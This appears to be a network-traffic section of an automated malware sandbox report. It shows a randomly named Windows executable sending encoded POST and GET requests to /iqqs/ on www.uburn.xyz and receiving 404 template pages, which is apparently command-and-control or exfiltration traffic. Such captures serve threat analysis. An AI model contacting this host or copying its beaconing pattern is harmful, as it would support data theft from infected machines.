                                                                                                                    Data Raw: 41 48 6b 78 3d 53 35 6e 4f 33 79 62 73 37 6d 73 36 54 36 68 73 63 39 2b 2f 34 38 77 71 70 4e 73 4b 50 54 32 6d 32 64 47 4a 2f 6e 73 51 54 79 62 57 4f 4e 53 72 6d 31 39 74 38 66 70 6f 41 73 68 54 2f 43 65 67 4d 7a 59 2b 65 66 70 77 46 5a 62 4d 31 50 51 66 43 6e 2b 4d 6c 42 53 77 2b 35 6a 31 73 41 6e 69 43 72 2b 42 41 34 57 36 61 47 68 45 6e 46 2b 55 6d 73 68 58 48 56 43 71 72 68 6e 5a 30 55 50 6d 4d 68 30 54 4f 2b 66 6e 51 37 49 72 44 68 63 45 6e 66 38 65 57 59 43 69 47 6e 32 68 74 6f 4e 6d 69 57 33 43 32 31 34 72 65 4c 38 76 31 6d 34 4c 44 42 61 4c 32 58 58 45 77 69 6e 61 75 75 6c 45 57 76 72 79 75 65 36 65 50 4a 66 6d 53 32 73 30 45 33 4c 4c 72 63 49 3d
                                                                                                                    Data Ascii: AHkx=S5nO3ybs7ms6T6hsc9+/48wqpNsKPT2m2dGJ/nsQTybWONSrm19t8fpoAshT/CegMzY+efpwFZbM1PQfCn+MlBSw+5j1sAniCr+BA4W6aGhEnF+UmshXHVCqrhnZ0UPmMh0TO+fnQ7IrDhcEnf8eWYCiGn2htoNmiW3C214reL8v1m4LDBaL2XXEwinauulEWvryue6ePJfmS2s0E3LLrcI=
                                                                                                                    Oct 9, 2024 14:19:41.767956972 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                    Date: Wed, 09 Oct 2024 12:19:41 GMT
                                                                                                                    Server: Apache
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Content-Length: 32106
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                                                                                                    Oct 9, 2024 14:19:41.768027067 CEST1236INData Raw: 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63
                                                                                                                    Data Ascii: rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL -->
                                                                                                                    Oct 9, 2024 14:19:41.768064022 CEST1236INData Raw: 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 74 65 78 74 2d 77 68 69 74 65 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20
                                                                                                                    Data Ascii: <button type="submit" class="btn bg-transparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-scre
                                                                                                                    Oct 9, 2024 14:19:41.768121958 CEST1236INData Raw: 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 65 6e 67 6c 61 6e 64 2e 70 6e 67 22 20 61 6c 74 3d 22 65 6e 67 6c 61 6e 64 20 66 6c 61 67 22 20 63 6c 61 73 73 3d 22 6d 72 2d 31 22 3e 20 45 6e 67 6c 69 73 68 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: custom/images/england.png" alt="england flag" class="mr-1"> English</a> <a class="dropdown-item white-color font-13 fables-second-hover-color" href="#"> <img src="assets/custom/images/France.png"
                                                                                                                    Oct 9, 2024 14:19:41.768173933 CEST896INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 62 72 61 6e 64 20 70 6c 2d 30 22 20 68 72 65 66 3d 22 69 6e 64 65 78 2e 68 74 6d 6c 22 3e 3c 69 6d 67 20 73 72 63 3d
                                                                                                                    Data Ascii: <a class="navbar-brand pl-0" href="index.html"><img src="assets/custom/images/fables-logo.png" alt="Fables Template" class="fables-logo"></a> <button class="navbar-toggler" type="button" da
                                                                                                                    Oct 9, 2024 14:19:41.768210888 CEST1236INData Raw: 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: aria-expanded="false"> Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1">
                                                                                                                    Oct 9, 2024 14:19:41.768240929 CEST224INData Raw: 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63
                                                                                                                    Data Ascii: toggle" href="#">Headers</a> <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a>
                                                                                                                    Oct 9, 2024 14:19:41.768275976 CEST1236INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22
                                                                                                                    Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header1-transparent.html">Header 1 Transparent</a></li>
                                                                                                                    Oct 9, 2024 14:19:41.768312931 CEST224INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 32 2d 64 61 72 6b 2e 68 74 6d 6c 22
                                                                                                                    Data Ascii: <li><a class="dropdown-item" href="header2-dark.html">Header 2 Dark</a></li> </ul> </li
                                                                                                                    Oct 9, 2024 14:19:41.768348932 CEST1236INData Raw: 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20
                                                                                                                    Data Ascii: > <li><a class="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu">
                                                                                                                    Oct 9, 2024 14:19:41.773272991 CEST1236INData Raw: 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64
                                                                                                                    Data Ascii: ></li> <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    7192.168.2.44945467.223.117.189803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:19:43.738126993 CEST10812OUTPOST /iqqs/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.uburn.xyz
                                                                                                                    Origin: http://www.uburn.xyz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10301
                                                                                                                    Referer: http://www.uburn.xyz/iqqs/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 53 35 6e 4f 33 79 62 73 37 6d 73 36 54 36 68 73 63 39 2b 2f 34 38 77 71 70 4e 73 4b 50 54 32 6d 32 64 47 4a 2f 6e 73 51 54 79 44 57 4f 65 4b 72 30 43 4a 74 37 66 70 6f 4e 4d 68 57 2f 43 65 48 4d 7a 67 36 65 66 74 4b 46 66 66 4d 30 73 49 66 4c 32 2b 4d 79 78 53 77 33 5a 6a 34 68 67 6d 2f 43 71 53 46 41 34 6d 36 61 47 68 45 6e 47 6d 55 69 39 68 58 4c 31 43 74 6f 68 6e 64 2b 30 4f 50 4d 6c 59 74 4f 39 79 61 51 4c 6f 72 44 42 73 45 72 4e 55 65 55 34 43 67 53 48 33 6d 74 6f 78 50 69 57 71 39 32 31 6c 4d 65 4c 59 76 30 67 77 49 54 43 43 64 72 55 65 59 7a 44 4c 50 76 4d 78 79 51 4f 66 39 6f 50 57 70 58 39 72 7a 4a 30 64 62 64 47 66 4c 35 4a 7a 32 41 74 6c 33 70 36 39 6f 76 6f 6d 4a 32 71 35 62 68 76 4f 36 46 6f 53 53 47 7a 4b 72 52 74 62 4d 63 32 57 2f 6a 73 65 63 6c 63 6e 2b 49 74 31 46 49 73 5a 65 50 38 75 6f 73 69 5a 7a 2f 76 66 70 56 77 2f 79 34 4b 75 43 31 37 63 72 45 56 43 59 4a 42 70 31 6d 79 4a 66 52 4d 61 53 4e 6c 42 69 54 49 59 31 61 2f 32 66 55 64 4c 37 55 58 43 6a 31 46 31 55 59 [TRUNCATED]
                                                                                                                    Data Ascii: AHkx=S5nO3ybs7ms6T6hsc9+/48wqpNsKPT2m2dGJ/nsQTyDWOeKr0CJt7fpoNMhW/CeHMzg6eftKFffM0sIfL2+MyxSw3Zj4hgm/CqSFA4m6aGhEnGmUi9hXL1Ctohnd+0OPMlYtO9yaQLorDBsErNUeU4CgSH3mtoxPiWq921lMeLYv0gwITCCdrUeYzDLPvMxyQOf9oPWpX9rzJ0dbdGfL5Jz2Atl3p69ovomJ2q5bhvO6FoSSGzKrRtbMc2W/jseclcn+It1FIsZeP8uosiZz/vfpVw/y4KuC17crEVCYJBp1myJfRMaSNlBiTIY1a/2fUdL7UXCj1F1UYjhgy8nm01FX41Mm/wkzcF4LUfX0JX6GJnOXWb8iASPOv5ar96ZYiE/PymJURk/2lEINn2KrciDjvN9gg3AbEnUpD6s4Dp60+J3uiQyOIuH/GKNrUBH9+21Fsy00Tu99KUEws/5fOlDACjtsjBsKkudkS7W2cKQuw6/FOUINzPR97lhJwOVM+K6g66r/vIrYNTtnJViw2ez8yFd5BKrx13gWzLcvMP/ip2yGMTMVR2Nm6qEH7gU1Hn9MehgtnFclmUZX3doGXGybSHhg0ITh7McLWIc7tmf/AXXKH8IR8seUfNJSWYn1hOfO0+giDio0NQWKMDA3HEyHhvDZNgW4p/Ktg4iIO6hfc7ngnBrOWHw/qk4hdZlJhb3CgiFPsiubW1uOGoFJdu8SJCGlVHG6Y2ePOiom/H7puaw6n0Bw+FwpamGe0594VYwxsMVG/TBaAP35+vwHQa54MYmlxhoXX4r4nzGhCNf0XR9l3he6eYRpTLPPHbVhz0rN/R/TW2XohdvRGO1cRmqr59ZbO7zzoUMrUS+llnik7vVufCilRveoZeGs7TGxCT0EdBWvugK0OHCxBneyL/vAAYC5InxHq02AniCQgg4U33/P0dvmTE4bjmrHoT4dFNmkJiUqr3p66URwHtnxdfDwn6XPOv7HqRLQfpvznlrJhYl [TRUNCATED]
                                                                                                                    Oct 9, 2024 14:19:44.427808046 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                    Date: Wed, 09 Oct 2024 12:19:44 GMT
                                                                                                                    Server: Apache
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Content-Length: 32106
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                                                                                                    Oct 9, 2024 14:19:44.427834034 CEST1236INData Raw: 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63
                                                                                                                    Data Ascii: rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL -->
                                                                                                                    Oct 9, 2024 14:19:44.427844048 CEST1236INData Raw: 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 74 65 78 74 2d 77 68 69 74 65 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20
                                                                                                                    Data Ascii: <button type="submit" class="btn bg-transparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-scre
                                                                                                                    Oct 9, 2024 14:19:44.427983046 CEST672INData Raw: 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 65 6e 67 6c 61 6e 64 2e 70 6e 67 22 20 61 6c 74 3d 22 65 6e 67 6c 61 6e 64 20 66 6c 61 67 22 20 63 6c 61 73 73 3d 22 6d 72 2d 31 22 3e 20 45 6e 67 6c 69 73 68 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: custom/images/england.png" alt="england flag" class="mr-1"> English</a> <a class="dropdown-item white-color font-13 fables-second-hover-color" href="#"> <img src="assets/custom/images/France.png"
                                                                                                                    Oct 9, 2024 14:19:44.427993059 CEST1236INData Raw: 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 66 61 62 6c 65 73 2d 74 68 69 72 64 2d 74 65 78 74 2d 63 6f 6c 6f 72 20 66 6f 6e 74 2d 31 33 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 61 62 6c 65 73 2d 69 63 6f 6e 65 6d 61 69 6c 22 3e 3c 2f 73
                                                                                                                    Data Ascii: <p class="fables-third-text-color font-13"><span class="fables-iconemail"></span> Email: Design@domain.com</p> </div> </div> </div></div> ... /End Top Header -->... Start Fables Navigation --><
                                                                                                                    Oct 9, 2024 14:19:44.427999020 CEST1236INData Raw: 61 62 6c 65 73 2d 6e 61 76 22 3e 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 22 3e 0a
                                                                                                                    Data Ascii: ables-nav"> <li class="nav-item dropdown"> <a class="nav-link dropdown-toggle" href="#" id="sub-nav1" data-toggle="dropdown" aria-haspopup="true" aria-expanded="fal
                                                                                                                    Oct 9, 2024 14:19:44.428009033 CEST1236INData Raw: 65 73 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: es </a> <ul class="dropdown-menu" aria-labelledby="sub-nav2"> <li><a class="dropdown-item dropdown-toggle" href="#">He
                                                                                                                    Oct 9, 2024 14:19:44.428021908 CEST672INData Raw: 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 20 32 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: item dropdown-toggle" href="#">Header 2</a> <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header2-transparent.h
                                                                                                                    Oct 9, 2024 14:19:44.428282022 CEST1236INData Raw: 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20
                                                                                                                    Data Ascii: > <li><a class="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu">
                                                                                                                    Oct 9, 2024 14:19:44.428350925 CEST1236INData Raw: 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64
                                                                                                                    Data Ascii: ></li> <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul>
                                                                                                                    Oct 9, 2024 14:19:44.432768106 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Footer 1</a>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    8192.168.2.44947067.223.117.189803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:19:46.278547049 CEST459OUTGET /iqqs/?rf-LZ=JlCtuN3HqPO8C&AHkx=f7Pu0FXPylRYdptkWs+23MtWxvoKJz6PgPaD0QQYagT1MtyUkVhu56FZSrYHt1j8AD8LTP1JVeTQ4dQlBUKb4laqx4Tc9G/2Lb24L4CzfFNZpkDBhe90DBs= HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Host: www.uburn.xyz
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Oct 9, 2024 14:19:46.872437000 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                    Date: Wed, 09 Oct 2024 12:19:46 GMT
                                                                                                                    Server: Apache
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Content-Length: 32106
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                                                                                                    Oct 9, 2024 14:19:46.872478962 CEST1236INData Raw: 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73
                                                                                                                    Data Ascii: strap.min.css" rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL
                                                                                                                    Oct 9, 2024 14:19:46.872519016 CEST1236INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 74 65 78 74 2d 77 68 69 74 65 22 3e
                                                                                                                    Data Ascii: <button type="submit" class="btn bg-transparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="
